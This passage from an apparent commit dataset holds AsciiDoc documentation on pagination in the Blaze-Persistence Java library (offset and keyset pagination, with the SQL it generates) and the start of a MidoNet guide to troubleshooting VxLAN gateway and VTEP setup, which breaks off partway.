cat.id ASC NULLS LAST\n--LIMIT 5 OFFSET 5\n----\n\n[.Object query]\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN :idParams\nORDER BY cat.id ASC NULLS LAST\n----\n\n[[anchor-keyset-pagination]]\n=== Keyset pagination\n\nKeyset pagination is a way to efficiently paginate or scroll through a large data set by querying for elements that come before or after a reference point.\nThe idea of a keyset is that every tuple can be uniquely identified by that keyset. So a keyset is essentially a reference point of a tuple in a data set ordered by keysets.\nKeyset pagination, in contrast to offset pagination, makes efficient use of the ordering property of the data set.\nBy remembering the highest and lowest keysets of a page, it is possible to query the previous and next pages efficiently.\n\nA keyset in terms of query results consists of the values of the `ORDER BY` expressions of a tuple.\nIn order to satisfy the uniqueness constraint, it is generally a good idea to use an entity's id as the last expression in the `ORDER BY` clause.\n\nNOTE: Currently the entity id is the *only* possible expression that satisfies the uniqueness constraint.\n\nKeyset pagination, just like offset pagination, requires index support on the DBMS side to work efficiently. A range-scan enabled index, like the one provided by a b-tree index, is required for keyset pagination to work best.\nIn contrast to offset pagination, an index does not have to be traversed like a list in order to _ignore_\/_skip_ a certain number of elements\/rows. Instead, a DBMS can make use of the structure of the index\nand traverse it in `O(log N)` as compared to `O(N)` to get to the `firstResult`. This characteristic makes keyset pagination especially useful for accessing latter pages.\n\nTIP: Don't allow too many different sort combinations as every combination requires a custom index to work efficiently.\n\nOne of the obvious requirements for keyset pagination to work is the need for a reference point i.e. 
a keyset from which point on the next or previous elements should be queried.\n\nThe API in {projectname} tries to allow making use of keyset pagination in a transparent and easy manner without compromises.\n\n[source, java]\n----\n\/\/ In the beginning we don't have a keyset page\nKeysetPage oldPage = null;\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(oldPage, 5, 5) #<1>\n .getResultList();\n\n\/\/ Query the next page with the keyset page of page2\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 10, 5) #<2>\n .getResultList();\n\n\/\/ Query the previous page with the keyset page of page2\nPagedList<Cat> page1 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 0, 5) #<3>\n .getResultList();\n----\n<1> The oldPage in this case is `null`, so internally it falls back to offset pagination\n<2> When querying the _next_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getHighest()[upper bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n<3> When querying the _previous_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getLowest()[lower bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n\nSince we are not fetching any collections, the ID query is avoided. For brevity, we skip the count query.\nSo let's look at the generated object queries:\n\n[.Object query 1]\n[source,sql]\n----\nSELECT cat, cat.id #<1>\nFROM Cat cat\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5 OFFSET 5\n----\n<1> The expression `cat.id` is for constructing the keyset and contains all expressions of the `ORDER BY` clause\n\nAs you can see, nothing fancy, except for the additional select that is used for extracting the keyset.\n\n[.Object query 2]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday > :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id > :_keysetParameter_1\n)\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5\n----\n\nThis time the query made efficient use of the keyset by filtering out elements\/rows that come before the reference point.\n\n[.Object query 3]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday < :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id < :_keysetParameter_1\n)\nORDER BY cat.birthday DESC NULLS FIRST, cat.id DESC NULLS FIRST\n--LIMIT 5\n----\n\nBefore, the query filtered out elements\/rows that came *before* the reference point; this time it does the opposite. It filters out elements\/rows coming *after* the reference point.\nAnother interesting thing to notice: the ordering was reversed too. This has the effect that the DBMS can traverse the index backwards, which essentially is how keyset pagination works.\nThe ordering is reversed again in-memory, so you don't notice anything of these details.\n\nNote that in the following situations, the implementation automatically falls back to offset pagination:\n\n* The keyset is invalid i.e. it is `null`\n* The ordering of the query changed\n* The page to navigate to is arbitrary i.e. 
not the next or previous page of a `keysetPage`.\n\nTo be able to make use of keyset pagination either via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API or the <<keyset-pagination-support,manual keyset filter API>>,\nthe link:{core_doc}\/persistence\/KeysetPage.html[`KeysetPage`] or the respective link:{core_doc}\/persistence\/Keyset.html[`Keyset`] elements have to be preserved across page requests.\nApplications that can retain state between requests (e.g. via a session) can just preserve the `KeysetPage` object itself. Applications that try to avoid server-side state have to serialize and deserialize the state somehow.\n\nSince the keyset state is available through link:{core_doc}\/persistence\/Keyset.html#getTuple()[getter methods], it shouldn't be too hard to do the serialization and deserialization.\nWhen implementing a custom `Keyset`, the `equals()` and `hashCode()` contracts have to make use of just the tuple. A custom `KeysetPage` implementation has to provide access to the lowest and highest keysets,\nas well as the `firstResult` and `maxResults` values used for querying that page.\n\nBeware that keyset pagination isn't perfect. If the ordering is not stable, i.e. entries can be _prepended_ relative to the current keyset\/reference point,\nthe page number calculation might become wrong over time. Most of the time this is negligible, as it gives the illusion that the user works on a snapshot of the data.\n\n[[anchor-navigate-entity-page]]\n=== Navigate to entity page\n\nNavigating to the page on which an entity with a specific id is located involves finding out the position of that entity.\n{projectname} offers a custom function named <<page-position,`PAGE_POSITION`>> which determines the absolute position of an entity in an ordered set.\n\n[source, java]\n----\nCat knownCat = \/\/...\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page((Object) knownCat.getId(), 3) #<1>\n .getResultList();\n----\n<1> If your id type is a primitive `int`, you must cast to `Object` or `Integer` to use the right method\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*), FUNCTION('PAGE_POSITION',(\n SELECT _page_position_cat.id\n FROM Cat _page_position_cat\n GROUP BY _page_position_cat.id, _page_position_cat.birthday\n ORDER BY _page_position_cat.birthday DESC NULLS FIRST, _page_position_cat.id DESC NULLS FIRST\n), :_entityPagePositionParameter)\nFROM Cat cat\n----\n\nThe count query contains the page position determination logic. It essentially passes an ID query as a subquery to the `PAGE_POSITION` function.\nThe concrete SQL implementation of that function depends on the DBMS, but they all follow the same main idea.\nWrap the ID query and count the row numbers. In another wrapper around that, filter for the row with the matching id and return the row number as the position.\nThe element\/row number of the first element on that page is calculated and used as `firstResult`. 
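To illustrate that last step (a sketch of the arithmetic only, not necessarily the exact implementation), given a 1-based absolute position as returned by `PAGE_POSITION` and the page size, the `firstResult` of the page containing that position can be computed like this:\n\n[source,java]\n----\n\/\/ hypothetical helper, assuming a 1-based position\nstatic int firstResultOfPage(int position, int maxResults) {\n \/\/ zero-based index of the first element on the containing page\n return ((position - 1) \/ maxResults) * maxResults;\n}\n\n\/\/ e.g. position 7 with a page size of 3 lies on the page starting at element index 6\nint firstResult = firstResultOfPage(7, 3); \/\/ == 6\n----\n\n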
Apart from this speciality, the rest of the query is just like a normal offset pagination query.\n\n=== Limitations\n\nSince the `PaginatedCriteriaBuilder` API can only paginate on entity level, the results are implicitly grouped by id and therefore distinct.\nBecause of that, the usage of `distinct()` or `groupBy()` on a `PaginatedCriteriaBuilder` is disallowed and will result in an exception.\n\nIf these limitations are not ok for your use case, you will have to implement a custom pagination strategy via `setFirstResult()` and `setMaxResults()`.","old_contents":"== Pagination\n\nPagination is often used to make large data sets consumable. It requires an ordered set of elements\/rows to be able to deterministically split the data into pages.\nImagine the following ordered data set\n\n[ditaa, nolightbox=\"true\"]\n....\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n| a | b | c | d | e | f | g | h | i | j | k | l | m | n | o | p | q | r | s | t | u | v | w | x | y | z |\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n....\n\nIf we split it up into pages of the size of 5 elements we get 6 pages and the last one only containing 1 element\n\n[ditaa, nolightbox=\"true\"]\n....\n +---+ +---+ +---+ +---+ +---+ +---+\n | a | | f | | k | | p | | u | | z |\n +---+ +---+ +---+ +---+ +---+ +---+\n | b | | g | | l | | q | | v |\n +---+ +---+ +---+ +---+ +---+\n | c | | h | | m | | r | | w |\n +---+ +---+ +---+ +---+ +---+\n | d | | i | | n | | s | | x |\n +---+ +---+ +---+ +---+ +---+\n | e | | j | | o | | t | | y |\n +---+ +---+ +---+ +---+ +---+\n\nPage 1 2 3 4 5 6\n....\n\n{projectname} provides two ways to do pagination.\n\n* Conventional pagination via link:{core_doc}\/persistence\/LimitBuilder.html#setFirstResult(int)[`setFirstResult()`] and link:{core_doc}\/persistence\/LimitBuilder.html#setMaxResults(int)[`setMaxResults()`]\n* Extended pagination support via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API\n\nConventional pagination in JPA only works on the main query which is also possible with {projectname}.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nORDER BY cat.id ASC NULLS LAST\n--LIMIT 1 OFFSET 1\n----\n\nIn addition to that, offset pagination for subqueries is also possible.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .where(\"id\").in()\n .from(Cat.class, \"subCat\")\n .select(\"subCat.id\")\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .end()\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN LIMIT((\n SELECT subCat.id\n FROM Cat cat\n ORDER BY cat.id ASC NULLS LAST\n),1 ,1) --LIMIT 1 OFFSET 1\n----\n\nThe extended pagination support comes via the criteria builder's link:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page()`] methods which come in three flavours:\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page(int firstResult, int maxResults)`]::\n\n Performs <<anchor-offset-pagination,offset pagination>> by skipping `firstResult` elements and from there on, show `maxResults` 
elements.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(com.blazebit.persistence.KeysetPage,%20int,%20int)[`page(KeysetPage keysetPage, int firstResult, int maxResults)`]::\n\n Performs <<anchor-keyset-pagination,keyset pagination>> if possible and falls back to offset pagination otherwise.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(java.lang.Object,%20int)[`page(Object entityId, int maxResults)`]::\n\n Navigates to the <<anchor-navigate-entity-page,page containing the entity>> with the given `entityId`. Falls back to the first page if no entity for the id exists.\n\n=== Under the hood\n\nIn {projectname} we have followed a more involved approach for implementing pagination than plainly using JPA standard\nmethods like `javax.persistence.Query.setMaxResults()` or `javax.persistence.Query.setFirstResult()` to steer the result set\ndimensions. This is due to deficiencies in some JPA providers when it comes to handling paginated queries containing\njoin fetches for collections.\n\nNOTE: By default, when using fetch joins for collections with Hibernate, all results are fetched instead of only the selected page.\n\nThe approach used in {projectname} consists of up to three queries executed consecutively:\n\n. The *count query* is used to fetch the total element count which is needed to populate `com.blazebit.persistence.PagedList.getTotalSize()` and\n`com.blazebit.persistence.PagedList.getTotalPages()`. If this query returns 0, no further queries are executed.\n\n. The *ID query* is used to fetch the entity ids that are contained in the target page. In this step, the previously\n mentioned `javax.persistence.Query.setMaxResults()` and `javax.persistence.Query.setFirstResult()` are used select the\n target ID set. Only selecting the IDs allows to omit all fetch joins, especially collection joins that might trigger inefficient jpa provider\n strategies. The *ID query* is omitted if no collection fetch joins are done, because in that case JPA providers tend to do the right thing when paginating directly.\n\n. Finally, the *object query* is used to fetch the entities as described by the original query specified by the user.\nThis query uses an `IN` predicate for the ID set retrieved in the previous step to restrict the fetched entities to the target\npage.\n\nNOTE: In a future version it might be possible to combine queries or disable the count query. For more information on that see https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/248[#248],\nhttps:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/249[#249] and https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/255[#255]\n\nTIP: You can inspect the query strings by using link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageCountQueryString()[`getPageCountQueryString()`],\nlink:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageIdQueryString()[`getPageIdQueryString()`] and link:{core_doc}\/persistence\/Queryable.html#getQueryString()[`getQueryString()`]\n\n[[anchor-offset-pagination]]\n=== Offset pagination\n\nAs already laid out in the <<pagination,introduction>>, pagination works on an ordered set of elements\/rows.\nOffset pagination basically looks at the ordered set from left to right and counts elements until the count reaches `firstResult`.\nFrom that point on elements are collected until `maxResults` of elements have been collected or no more elements are available.\n\nThis basically means that the `OFFSET` i.e. 
`firstResult` part forces a DBMS to actually determine an element\/row is visible for a transaction and then _ignore_\/_skip_ it.\nThe bigger the `firstResult` value, the more resources the DBMS has to waste for _skipping_ elements\/rows.\nThis essentially means that when employing offset pagination, accessing the latter pages will become more and more expensive.\nIn order for this approach to be actually usable with larger data sets, a DBMS index that can be used for the ordering is required to avoid constantly loading and sorting data.\nIn addition to that, the DBMS should have enough RAM to keep the index fully in-memory to avoid costly disk fetches.\n\nAlthough offset pagination works in every case, it should be avoided if possible because of the performance implications.\nAs you will see in the <<anchor-keyset-pagination,keyset pagination part>> there is a more efficient approach to pagination that almost uses the same API.\n\nThe following example illustrates the usage and what happens behind the scenes\n\n[source, java]\n----\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(5, 5)\n .getResultList();\n----\n\nExecutes the following queries\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*)\nFROM Cat cat\n----\n\nNote that the *ID query* is necessary because of the join fetched collection `kittens`\n\n[.ID query]\n[source,sql]\n----\nSELECT cat.id\nFROM Cat cat\nORDER BY cat.id ASC NULLS LAST\n--LIMIT 1 OFFSET 1\n----\n\n[.Object query]\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN :idParams\nORDER BY cat.id ASC NULLS LAST\n----\n\n[[anchor-keyset-pagination]]\n=== Keyset pagination\n\nKeyset pagination is a way to efficiently paginate or scroll through a large data set by querying for elements that come before or after a reference point.\nThe idea of a keyset is, that every tuple can be uniquely identified by that keyset. So a keyset essentially is a reference point of a tuple in a data set ordered by keysets.\nKeyset pagination in contrast to offset pagination makes efficient use of the ordering property of the data set.\nBy remembering the highest and lowest keysets of a page, it is possible to query the previous and next pages efficiently.\n\nA keyset in terms of query results consists of the values of the `ORDER BY` expressions of a tuple.\nIn order to satisfy the uniqueness constraint, it is generally a good idea to use an entity's id as last expression in the `ORDER BY` clause.\n\nNOTE: Currently the entity id is the *only* possible expression that satisfies the uniqueness constraint.\n\nKeyset pagination just like offset pagination requires index support on the DBMS side to work efficiently. A range-scan enabled index like provided by a b-tree index is required for keyset pagination to work best.\nIn contrast to offset pagination, an index does not have to be traversed like a list in order to _ignore_\/_skip_ a certain amount of elements\/rows. Instead, a DBMS can make use of the structure of the index\nand traverse it in `O(log N)` as compared to `O(N)` to get to the `firstResult`. This characteristic makes keyset pagination especially useful for accessing latter pages.\n\nTIP: Don't allow too many different sort combinations as every combination requires a custom index to work efficiently.\n\nOne of the obvious requirements for keyset pagination to work, is the need for a reference point i.e. 
 a keyset from which point on the next or previous elements should be queried.\n\nThe API in {projectname} allows you to make use of keyset pagination in a transparent and easy manner, without compromises.\n\n[source, java]\n----\n\/\/ In the beginning we don't have a keyset page\nKeysetPage oldPage = null;\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .orderByAsc("birthday")\n .orderByAsc("id") \/\/ unique ordering is required for pagination\n .page(oldPage, 5, 5) #<1>\n .getResultList();\n\n\/\/ Query the next page with the keyset page of page2\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc("birthday")\n .orderByAsc("id") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 10, 5) #<2>\n .getResultList();\n\n\/\/ Query the previous page with the keyset page of page2\nPagedList<Cat> page1 = cbf.create(em, Cat.class)\n .orderByAsc("birthday")\n .orderByAsc("id") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 0, 5) #<3>\n .getResultList();\n----\n<1> The oldPage in this case is `null`, so internally it falls back to offset pagination\n<2> When querying the _next_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getHighest()[upper bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n<3> When querying the _previous_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getLowest()[lower bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n\nSince we are not fetching any collections, the ID query is avoided. For brevity, we skip the count query.\nSo let's look at the generated object queries:\n\n[.Object query 1]\n[source,sql]\n----\nSELECT cat, cat.id #<1>\nFROM Cat cat\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5 OFFSET 5\n----\n<1> The expression `cat.id` is for constructing the keyset and contains all expressions of the `ORDER BY` clause\n\nAs you can see, nothing fancy, except for the additional select that is used for extracting the keyset.\n\n[.Object query 2]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday > :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id > :_keysetParameter_1\n)\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5\n----\n\nThis time the query made efficient use of the keyset by filtering out elements\/rows that come before the reference point.\n\n[.Object query 3]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday < :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id < :_keysetParameter_1\n)\nORDER BY cat.birthday DESC NULLS FIRST, cat.id DESC NULLS FIRST\n--LIMIT 5\n----\n\nWhereas the previous query filtered out elements\/rows that came *before* the reference point, this time it does the opposite: it filters out elements\/rows coming *after* the reference point.\nAnother interesting thing to notice is that the ordering was reversed too. This allows the DBMS to traverse the index backwards, which essentially is how keyset pagination works.\nThe ordering is reversed again in-memory, so you don't notice any of these details.\n\nNote that in the following situations, the implementation automatically falls back to offset pagination:\n\n* The keyset is invalid, i.e. it is `null`\n* The ordering of the query changed\n* The page to navigate to is arbitrary, i.e.
 not the next or previous page of a `keysetPage`\n\nTo be able to make use of keyset pagination either via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API or the <<keyset-pagination-support,manual keyset filter API>>,\nthe link:{core_doc}\/persistence\/KeysetPage.html[`KeysetPage`] or the respective link:{core_doc}\/persistence\/Keyset.html[`Keyset`] elements have to be preserved across page requests.\nApplications that can retain state between requests (i.e. via a session) can just preserve the `KeysetPage` object itself. Applications that try to avoid server-side state have to serialize and deserialize the state somehow.\n\nSince the keyset state is available through link:{core_doc}\/persistence\/Keyset.html#getTuple()[getter methods], it shouldn't be too hard to do the serialization and deserialization.\nWhen implementing a custom `Keyset`, the `equals()` and `hashCode()` contracts have to make use of just the tuple. A custom `KeysetPage` implementation has to provide access to the lowest and highest keysets,\nas well as the `firstResult` and `maxResults` values used for querying that page.
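\n\nThe following is a minimal sketch of such a round trip, reusing the `page2` result from the example above; the `serialize()` and `deserialize()` helpers are hypothetical placeholders for whatever mechanism the application uses:\n\n[source, java]\n----\n\/\/ After querying a page, extract the keyset state that has to survive the request\nKeysetPage keysetPage = page2.getKeysetPage();\nSerializable[] lowest = keysetPage.getLowest().getTuple(); \/\/ keyset of the first element\nSerializable[] highest = keysetPage.getHighest().getTuple(); \/\/ keyset of the last element\nString state = serialize(keysetPage.getFirstResult(), keysetPage.getMaxResults(), lowest, highest);\n\n\/\/ On the next request, rebuild a KeysetPage from the serialized state and page on\nKeysetPage restoredPage = deserialize(state);\nPagedList<Cat> nextPage = cbf.create(em, Cat.class)\n .orderByAsc("birthday")\n .orderByAsc("id")\n .page(restoredPage, 10, 5)\n .getResultList();\n----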
\n\n[[anchor-navigate-entity-page]]\n=== Navigate to entity page\n\nNavigating to the page that contains the entity with a specific id involves finding out the position of that entity.\n{projectname} offers a custom function named <<page-position,`PAGE_POSITION`>> which determines the absolute position of an entity in an ordered set.\n\n[source, java]\n----\nCat knownCat = \/\/...\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc("birthday")\n .orderByAsc("id") \/\/ unique ordering is required for pagination\n .page((Object) knownCat.getId(), 3) #<1>\n .getResultList();\n----\n<1> If your id type is a primitive `int`, you must cast to `Object` or `Integer` to use the right method\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*), FUNCTION('PAGE_POSITION',(\n SELECT _page_position_cat.id\n FROM Cat _page_position_cat\n GROUP BY _page_position_cat.id, _page_position_cat.birthday\n ORDER BY _page_position_cat.birthday DESC NULLS FIRST, _page_position_cat.id DESC NULLS FIRST\n), :_entityPagePositionParameter)\nFROM Cat cat\n----\n\nThe count query contains the page position determination logic. It essentially passes an ID query as a subquery to the `PAGE_POSITION` function.\nThe concrete SQL implementation of that function depends on the DBMS, but they all follow the same main idea:\nwrap the ID query and count the row numbers, then, in another wrapper around that, filter for the row with the matching id and return its row number as the position.\nThe element\/row number of the first element on that page is calculated and used as `firstResult`. Apart from this special case, the rest of the query is just like a normal offset pagination query.\n\n=== Limitations\n\nSince the `PaginatedCriteriaBuilder` API can only paginate on entity level, the results are implicitly grouped by id and therefore distinct.\nBecause of that, the usage of `distinct()` or `groupBy()` on a `PaginatedCriteriaBuilder` is disallowed and will result in an exception.\n\nIf these limitations are not acceptable for your use case, you will have to implement a custom pagination strategy via `setFirstResult()` and `setMaxResults()`.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53038ef86e8c69132b98643575bb8bdcb1cd264c","subject":"Add troubleshooting for VxLAN Gateway","message":"Add troubleshooting for VxLAN Gateway\n\nChange-Id: I649d28ef28248555a70cb8970f062a33652f7916\nSigned-off-by: Galo Navarro <993a0c35b28faad02772940a5764c74e22075164@midokura.com>\nSigned-off-by: Jan Hilberath <14e793d896ddc8ca6911747228e86464cf420065@hilberath.de>\n","repos":"midonet\/midonet-docs,yantarou\/midonet-docs,yantarou\/midonet-docs,yantarou\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs","old_file":"docs\/operation-guide\/src\/vxlan\/section_troubleshooting.adoc","new_file":"docs\/operation-guide\/src\/vxlan\/section_troubleshooting.adoc","new_contents":"[[vxgw_troubleshooting]]\n= Troubleshooting VTEP\/VXGW configuration\n\nVTEP deployments have a relatively large number of moving pieces and\npotential failure points. This guide will focus on troubleshooting\nMidoNet and the integration with the VTEP. For specifics on the\nconfiguration of the logical switch please refer to your vendor's\ndocumentation.\n\n*Is the MidoNet API able to connect to the VTEP?*\n\nAfter following the procedure to add a VTEP as described in xref:cli_add_vtep[],\nthe expected output should be as follows:\n\n[source]\nmidonet> vtep add management-ip 119.15.120.123 management-port 6633 tunnel-zone tzone0\nmanagement-ip 119.15.120.123 management-port 6633 tunnel-zone tzone0 connection-state CONNECTED\n\nThe same output should appear for VTEPs already added to MidoNet.\n\nNote that the state is CONNECTED. An ERROR state will indicate that the\nVTEP's management IP is unreachable from the MidoNet API.\n\n*Is the VTEP well configured?*\n\nA typical reason for the VTEP being in ERROR state is a misconfiguration\nof the VTEP OVSDB instance. You can verify this by executing the\nfollowing command on the console:\n\n[source]\novsdb-client dump hardware_vtep\n\nScroll down to the Physical_Switch table, which will look like this:\n\n[source]\n----\nPhysical_Switch table\n_uuid description management_ips name ports switch_fault_status tunnel_ips\n------------------------------------ ------------------- ---------------- ----------- -------------------------------------- ------------------- ------------\n3647f020-9ecf-4854-8f75-9011b8c9996a \"VTEP DESCRIPTION\" [\"192.168.2.14\"] \"VTEP NAME\" [698ede89-31f8-4797-a885-1b2dd4c585e3] [] [\"10.0.0.1\"]\n----\n\nVerify that an entry exists, and that the management_ips and tunnel_ips\nfields correspond to the physical configuration. The management IP is\nthe one you'll be using on the \"vtep add\" command.
 The tunnel IP is not\nrelevant at this point; however, MidoNet expects a value to be present\nin this field.\n\n*Is the OVSDB instance running and accessible?*\n\nIf the MidoNet API shows an ERROR on the VTEP list, and your\nconfiguration is correct, you should verify that the OVSDB instance is\nlistening on the same management-port that you're specifying in the vtep\nadd call.\n\nFrom the host running the MidoNet REST API (and Coordinator) try to\nestablish a Telnet connection to the VTEP management interface IP and\nport, assuming these are 192.168.2.13 and 6632:\n\n[source]\ntelnet 192.168.2.13 6632\n\nIf the connection is successful, you should see the following output:\n\n[source]\nTrying 192.168.2.13...\nConnected to 192.168.2.13.\nEscape character is '^]'.\n\nThis means that we have a TCP socket listening on the right port, and\nwe can now verify that the OVSDB is responsive. If the connection\nfails, check your switch manual for instructions on making the OVSDB\nlisten for connections on the selected TCP port.\n\nIf the output was correct, then enter the following input into the\nconsole:\n\n[source]\n{\"method\":\"list_dbs\",\"id\":\"list_dbs\",\"params\":[]}\n\nThe desired output is:\n\n[source]\n{\"id\":\"list_dbs\",\"result\":[\"hardware_vtep\"],\"error\":null}\n\nThe content of the brackets after \"result\" may vary, but we must see a\n\"hardware_vtep\", indicating that there is a VTEP schema on this instance\nof the OVSDB. If you fail to see this output, the VTEP likely doesn't\ncontain a hardware_vtep schema in its OVSDB instance. Refer to your\nswitch documentation for instructions to configure it.\n\n*VTEP and bindings are added but no traffic goes through*\n\nVerify first that you enabled the VxLAN Gateway Service in the MidoNet\nAPI. This service is not enabled by default, but is required to\nconfigure the VTEP and synchronize state. Open the MidoNet API\nconfiguration file:\n\n[source]\nvi \/usr\/share\/midonet-api\/WEB-INF\/web.xml\n\nScroll down until you find this section:\n\n[source]\n<!-- VXLAN gateway configuration -->\n<context-param>\n <param-name>midobrain-vxgw_enabled<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n\nMake sure that the value is set to \"true\" in all MidoNet API instances\nthat you want to participate in VxLAN Gateway coordination.\n\n*Verify that the VxLAN Gateway service is started*\n\nThe VxLAN Gateway service may be enabled in several MidoNet API\ninstances. All of them will coordinate through the Network State\nDatabase (NSDB) to elect a leader that will perform all coordination\ntasks. When a MidoNet API instance takes over leadership the following\nINFO message is displayed in the logs (\/var\/log\/tomcat\/catalina.out):\n\n[source]\n\"I am the VxLAN Gateway leader! \\\\o\/\"\n\nIf another instance is already a leader, all other instances will\ndisplay the following INFO message:\n\n[source]\n\"I am no longer VxLAN Gateway leader, going passive\"\n\nAt least one instance of the MidoNet API should display the positive\nmessage indicating that it became the VxLAN Gateway Leader. This is the\ninstance that should be watched for further log messages.\n\n*Verify that the VxLAN Gateway leader picks up VTEPs and Networks*\n\nVxLAN Gateway services will scan all the Neutron networks in MidoNet's\nNSDB and proceed to monitor those that are bound to any VTEPs.\n\nWhenever a Neutron network is bound to a VTEP, the following message\nwill appear in the INFO logs.
 Note that all log messages relevant to a\ngiven Neutron network will be tagged with the appropriate UUID:\n\n[source]\nINFO c68fa502-62e5-4b33-9f2f-d5d0257deb4f - Successfully processed update\n\nYou can filter updates relevant to specific networks by editing:\n\n[source]\nvi \/usr\/share\/midonet-api\/WEB-INF\/classes\/logback.xml\n\nFollow the instructions detailed in this file to enable different\nprocesses in the coordinator. For brevity, log messages mentioned\nbelow will omit the Network UUID tag.\n\nAs mentioned above, you should be seeing a message like the following\nfor each Neutron network:\n\n[source]\nNetwork <NETWORK_UUID> is now part of a VxLAN Gateway\n\nFailures during this phase typically indicate errors accessing the\nNSDB, for example:\n\n[source]\nCannot retrieve network state\n\nThe MidoNet controller will WARN in the logs whenever a recoverable\nerror is found, and try to restore connectivity to the NSDB.\nNon-recoverable errors will be marked as ERROR.\n\nIf the logs show problems connecting to the NSDB, verify that the NSDB\nis active and that the MidoNet API is able to access it.\n\n*Verify that the MidoNet coordinator synchronizes MACs with the VTEPs*\n\nAfter fetching the Neutron network configuration from the NSDB, the MidoNet\nAPI logs should display the following messages (note that they may\nappear mixed with other messages):\n\n[source]\nStarting to watch MAC-Port table in <NEUTRON_UUID>\nStarting to watch ARP table in <NEUTRON_UUID>\nNetwork state now monitored\n\nThese indicate that the MidoNet coordinator is monitoring the network's\nstate, which will be synchronized to the VTEP.\n\n*Verify that the MidoNet coordinator connects to the VTEP(s)*\n\nThe MidoNet coordinator will also bootstrap a process to exchange state\nbetween the network and all VTEPs with port-vlan pairs bound to it. When\nthe controller detects any port-vlan pair in a new VTEP, it'll show the\nfollowing message (assuming the management IP and management port are\n192.168.2.13 and 6632):\n\n[source]\nBindings to new VTEP at 192.168.2.13:6632\n\nAt this point it will ensure that a connection is established to this\nVTEP's management IP and that the bindings configured through the\nMidoNet REST API are correctly reflected in the VTEP. Normal output will\nlook like this (note that the messages may appear mixed with other messages):\n\n[source]\nConsolidate state into OVSDB for <VXLAN GATEWAY 